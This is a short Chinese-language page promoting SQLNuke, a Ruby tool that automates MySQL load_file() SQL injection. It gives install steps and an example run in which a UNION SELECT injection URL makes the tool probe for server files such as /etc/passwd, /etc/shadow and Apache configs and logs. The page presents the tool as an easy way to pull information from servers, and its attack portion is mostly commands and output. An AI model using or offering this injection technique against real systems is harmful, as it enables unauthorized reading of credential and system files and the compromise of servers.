SQLNuke:MYSQL load_file()函数注入工具

SQLNuke是一个功能强大而又简单的MYSQL load_file()函数注入工具。

在Mysql进行SQL注入攻击中,当你需要收集一些服务器的信息,你能想到的最好的方式是从load_file()函数下手,而手工推测的方法会耗费大量的时间,现在SQLNuke可以帮助你使这个过程轻松愉快。

1rMmil6o1pSBnRFOQC8bpjdQvp

 

依赖:

git

 

$ sudo apt-get install git-core
$ which git
_/usr/bin/git_
$ git --version
_git version 1.7.0.4_

 

ruby (Ubuntu)

 

$ sudo apt-get install ruby

 

SQLNuke Installation

 

$ git clone https://github.com/nuke99/sqlnuke.git
$ cd sqlnuke
$ ./sql.rb

 

基本用法

 

root@hakb0x:/sqlnuke# ./sql.rb -u 'http://localhost/index.php?id=-1+UNION+SELECT+1,XxxX,3--'
[!] localhost folder already exists
[!] No OS selected, Continue with all the possibilities
[200] - [Failed]     /etc/apache2/logs/access.log
[200] - [Success]    /etc/hosts
[200] - [Failed]     /home/apache/httpd.conf
[200] - [Failed]     /usr/local/apache2/conf/httpd.conf
[200] - [Failed]     /etc/apache2/vhosts.d/default_vhost.include
[200] - [Failed]     /etc/apache2/apache2.conf
[200] - [Failed]     /opt/apache/conf/httpd.conf
[200] - [Failed]     /usr/local/apache/conf/httpd.conf
[200] - [Failed]     /var/www/vhosts/sitename/httpdocs//etc/init.d/apache
[200] - [Success]    /etc/passwd
[200] - [Failed]     /etc/apache/apache.conf
[200] - [Failed]     /etc/httpd/conf/httpd.conf
[200] - [Failed]     /home/apache/conf/httpd.conf
[200] - [Failed]     /etc/apache2/sites-available/default
[200] - [Failed]     /etc/apache/httpd.conf
[200] - [Failed]     /etc/httpd/access.log
[200] - [Failed]     /etc/apache2/httpd.conf
[200] - [Failed]     /etc/httpd/httpd.conf
[200] - [Failed]     /etc/init.d/apache2/httpd.conf
[200] - [Failed]     /etc/init.d/apache/httpd.conf
[200] - [Success]    /etc/group
[200] - [Failed]     C:/wamp/bin/apache/logs/access.log
[200] - [Failed]     /etc/shadow
....

[+] Saved files are in 'output/localhost'

下载地址

SQLNuke:MYSQL load_file()函数注入工具:等您发表观点!

发表评论


快捷键:Ctrl+Enter